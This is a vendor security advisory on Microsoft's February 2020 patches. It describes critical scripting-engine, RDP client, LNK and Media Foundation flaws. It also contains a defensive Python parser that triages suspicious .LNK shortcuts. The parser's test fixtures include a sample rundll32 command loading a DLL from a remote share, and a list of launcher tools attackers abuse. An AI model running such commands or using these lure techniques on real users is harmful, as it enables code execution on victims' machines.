Overview
Microsoft released its February 2020 security updates on Patch Tuesday. The updates fix 100 vulnerabilities ranging from spoofing to remote code execution across a wide range of products, including Adobe Flash Player, Internet Explorer, Microsoft Edge, Microsoft Exchange Server, Microsoft Graphics Component, Microsoft Malware Protection Engine, Microsoft Office, Microsoft Office SharePoint, Microsoft Scripting Engine, Microsoft Windows, Microsoft Windows Search Component, Remote Desktop Client, Secure Boot, SQL Server, Windows Authentication Methods, Windows COM, Windows Hyper-V, Windows Installer, Windows Kernel, Windows Kernel-Mode Drivers, Windows Media, Windows NDIS, Windows RDP, Windows Shell, and Windows Update Stack.
Among these vulnerabilities, there are 12 critical vulnerabilities and 88 important vulnerabilities.
Critical Vulnerability Description
The patches fix the following 12 critical vulnerabilities.
Microsoft Scripting Engine
- CVE-2020-0673, CVE-2020-0674
On January 17, Microsoft published an out-of-band advisory for CVE-2020-0674 stating that it was aware of limited targeted attacks exploiting the vulnerability in the wild. That advisory offered only workarounds and mitigations (restricting access to jscript.dll, the legacy JScript engine); this month's security update contains the actual fix. Administrators who applied the jscript.dll access restriction should remove it once the update is installed: it is no longer needed, and it can break software that still depends on the legacy engine.
A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer.
An attacker who successfully exploited this vulnerability could gain the same user rights as the current user. If the current user is logged in with administrative user rights, an attacker could exploit this vulnerability to take complete control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
In a web-based attack scenario, an attacker could host a specially crafted website and convince a user to view it. The attacker has no way to force a user to view the malicious content, so the usual route is a link delivered by email or instant message that tricks the user into visiting the site. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine, so that the vulnerable engine is reached without the user opening a browser at all.
Internet Explorer 9, 10, and 11 are affected.
For more details about the vulnerabilities and updates, click the following links:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0673
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0674
- CVE-2020-0710, CVE-2020-0711, CVE-2020-0712, CVE-2020-0713, CVE-2020-0767
A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory in Microsoft Edge (the EdgeHTML-based browser; the Chromium-based Edge uses V8 rather than ChakraCore). An attacker who successfully exploited this vulnerability could gain the same user rights as the current user, with the same consequences described for Internet Explorer above.
For more details about the vulnerabilities and updates, click the following links:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0710
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0711
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0712
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0713
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0767
RDP
- CVE-2020-0681, CVE-2020-0734
CVE-2020-0681 and CVE-2020-0734 are remote code execution vulnerabilities in the Windows Remote Desktop client.
An attacker who successfully exploited either vulnerability could execute arbitrary code on the computer of a user who connects to a malicious RDP server. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
To exploit these vulnerabilities, an attacker needs to control an RDP server and then get a user to connect to it. Although attackers cannot force a user to connect, they could trick them into doing so via social engineering, DNS poisoning, or a man-in-the-middle (MITM) position on the path to a legitimate server. Alternatively, an attacker who has already compromised a legitimate RDP server by other means could serve the malicious responses from it and wait for users to connect. Note that this is a client-side bug: the unpatched component is mstsc and the RDP client libraries on the connecting workstation, not the server being connected to, so administrative jump hosts and help-desk machines that initiate many RDP sessions are the most exposed.
For more details about the vulnerabilities and updates, click the following links:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0681
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0734
Windows
- CVE-2020-0662
A remote code execution vulnerability exists in the way that Windows handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code with escalated privileges on the target system.
To exploit the vulnerability, an attacker who already holds a domain user account could send a specially crafted request to the target, causing Windows to execute arbitrary code with elevated privileges. Because only a low-privileged domain account is required, this is an attractive lateral-movement and privilege-escalation primitive once any domain credential has been obtained.
For more details about the vulnerability and update, click the following link:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0662
LNK
- CVE-2020-0729
A remote code execution vulnerability exists in Microsoft Windows that is triggered when a specially crafted .LNK (shortcut) file is processed.
An attacker who successfully exploited this vulnerability could gain the same user rights as the local user.
An attacker could exploit this vulnerability by providing the user with a removable drive or remote share containing a malicious .LNK file and an associated malicious binary. If the user opens the drive or share in Windows Explorer, or in any other application that parses .LNK files, the malicious binary executes code of the attacker's choice on the target system. Because Explorer parses shortcuts to render their icons, simply browsing the folder can be enough; the user does not have to double-click the shortcut. Until hosts are patched, avoid browsing untrusted removable media and shares from interactive sessions, and triage suspicious shortcut files with a tool that does not hand them to the Windows shell link parser.
For more details about the vulnerability and update, click the following link:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0729
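The following is an added example and is not code from NSFOCUS or Microsoft. It is a minimal pure-Python parser for the .LNK format (MS-SHLLINK: header, optional LinkInfo, StringData) plus triage heuristics of my own for the lure pattern described above: a shortcut on a removable drive or share whose target travels with it, or which invokes a script host with arguments. Parsing the bytes in Python means the file is never passed to the Windows shell link parser, which is the component the vulnerability lives in. The sample shortcuts are constructed inline by build_lnk for this example (a test fixture, not real-world files), and the heuristics are not a detection signature for CVE-2020-0729 itself.

```python
"""Parse .LNK files without touching the Windows shell, then flag suspicious ones."""
import struct
from dataclasses import dataclass

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags bits from the MS-SHLLINK ShellLinkHeader
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
DRIVE_REMOVABLE = 2                      # VolumeID.DriveType for removable media
LAUNCHERS = {"cmd.exe", "powershell.exe", "rundll32.exe", "mshta.exe",
             "regsvr32.exe", "wscript.exe", "cscript.exe"}   # author's list, not exhaustive


@dataclass
class Lnk:
    flags: int
    drive_type: int = -1
    local_path: str = ""
    net_name: str = ""
    path_suffix: str = ""
    relative_path: str = ""
    working_dir: str = ""
    arguments: str = ""


def _cstr(buf: bytes, off: int) -> str:
    """NUL-terminated ANSI string at buf[off]."""
    return buf[off:buf.index(b"\x00", off)].decode("latin-1")


def parse_lnk(data: bytes) -> Lnk:
    if len(data) < 76 or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    lnk, pos = Lnk(flags), 76
    if flags & HAS_IDLIST:                                   # skip the ItemIDList blob
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:
        li_size, _hdr, li_flags, vol_off, lbp_off, cnrl_off, cps_off = \
            struct.unpack_from("<7I", data, pos)
        li = data[pos:pos + li_size]                         # offsets are LinkInfo-relative
        if li_flags & 0x1:                                   # VolumeIDAndLocalBasePath
            lnk.drive_type = struct.unpack_from("<I", li, vol_off + 4)[0]
            lnk.local_path = _cstr(li, lbp_off)
        if li_flags & 0x2:                                   # CommonNetworkRelativeLink (UNC)
            cnrl = li[cnrl_off:]
            lnk.net_name = _cstr(cnrl, struct.unpack_from("<I", cnrl, 8)[0])
        lnk.path_suffix = _cstr(li, cps_off)
        pos += li_size

    def string_data() -> str:                                # CountCharacters + chars, no NUL
        nonlocal pos
        n = struct.unpack_from("<H", data, pos)[0]
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos + 2:pos + 2 + n * width]
        pos += 2 + n * width
        return raw.decode("utf-16-le" if width == 2 else "latin-1")

    # StringData fields appear in this fixed order when their flag is set
    for bit, attr in ((HAS_NAME, None), (HAS_RELPATH, "relative_path"),
                      (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
                      (HAS_ICON, None)):
        if flags & bit:
            value = string_data()
            if attr:
                setattr(lnk, attr, value)
    return lnk


def triage(lnk: Lnk) -> list:
    """Reasons this shortcut deserves a look; an empty list means unremarkable."""
    target = (lnk.local_path + lnk.path_suffix) or lnk.relative_path
    exe = target.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    reasons = []
    if lnk.drive_type == DRIVE_REMOVABLE:
        reasons.append("target lives on a removable drive: " + target)
    if lnk.net_name:
        reasons.append("target lives on network share " + lnk.net_name)
    if lnk.relative_path and not lnk.local_path:
        reasons.append("target is relative to the .lnk itself: " + lnk.relative_path)
    if exe in LAUNCHERS and lnk.arguments:
        reasons.append(exe + " invoked with arguments: " + lnk.arguments)
    return reasons


def build_lnk(local_path="", relative="", arguments="", drive_type=3) -> bytes:
    """Constructed test fixture: assemble a minimal, spec-shaped .lnk from fields."""
    flags, body = IS_UNICODE, b""
    if local_path:
        flags |= HAS_LINKINFO
        vol = struct.pack("<4I", 17, drive_type, 0, 16) + b"\x00"   # VolumeID, empty label
        lbp = local_path.encode("latin-1") + b"\x00"
        lbp_off = 28 + len(vol)
        cps_off = lbp_off + len(lbp)
        body += struct.pack("<7I", cps_off + 1, 28, 1, 28, lbp_off, 0, cps_off) + vol + lbp + b"\x00"
    for text, bit in ((relative, HAS_RELPATH), (arguments, HAS_ARGS)):
        if text:
            flags |= bit
            body += struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return struct.pack("<I16sI", 0x4C, LNK_CLSID, flags) + bytes(52) + body


SAMPLES = {  # constructed for this example, not captured from an incident
    "docs.lnk": build_lnk(local_path="C:\\Users\\alice\\Documents"),
    "invoice.pdf.lnk": build_lnk(local_path="E:\\.cache\\svchost.exe", drive_type=DRIVE_REMOVABLE),
    "readme.lnk": build_lnk(local_path="C:\\Windows\\System32\\rundll32.exe",
                            arguments="\\\\10.0.0.5\\share\\payload.dll,Start"),
    "setup.lnk": build_lnk(relative=".\\setup\\update.exe"),
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(name, triage(parse_lnk(blob)) or "ok")
```

On a real incident the loop would walk the mounted drive or share with os.scandir and feed each .lnk to parse_lnk from a patched analysis host; the parser deliberately skips the ItemIDList, so shortcuts that carry their target only in that structure will show an empty path and should be escalated rather than dismissed.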
Media Foundation
- CVE-2020-0738
A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.
An attacker who successfully exploited this vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights.
There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious web page.
For more details about the vulnerability and update, click the following link:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0738
Statement
This advisory is only used to describe a potential risk. NSFOCUS does not provide any commitment or promise on this advisory. NSFOCUS and the author will not bear any liability for any direct and/or indirect consequences and losses caused by transmitting and/or using this advisory. NSFOCUS reserves all the rights to modify and interpret this advisory. Please include this statement paragraph when reproducing or transferring this advisory. Do not modify this advisory, add/delete information to/from it, or use this advisory for commercial purposes without permission from NSFOCUS.
About NSFOCUS
NSFOCUS Information Technology Co., Ltd. (NSFOCUS) was founded in April 2000. With more than 30 branches and subsidiaries in China and abroad, the company provides highly competitive security products and solutions for governments, carriers, and the financial, energy, Internet, education, and medical sectors, ensuring customers' business continuity.
Based on years of research in security assurance, NSFOCUS has set foot in network and terminal security, Internet infrastructure security, and compliance and security management. The company provides the intrusion detection/prevention system, anti-DDoS system, remote security assessment system, and web security protection products as well as professional security services for customers.
NSFOCUS Information Technology Co., Ltd. started trading its shares at China’s Nasdaq-style market, ChiNext, in Shenzhen on January 29, 2014, with the name of NSFOCUS and code of 300369.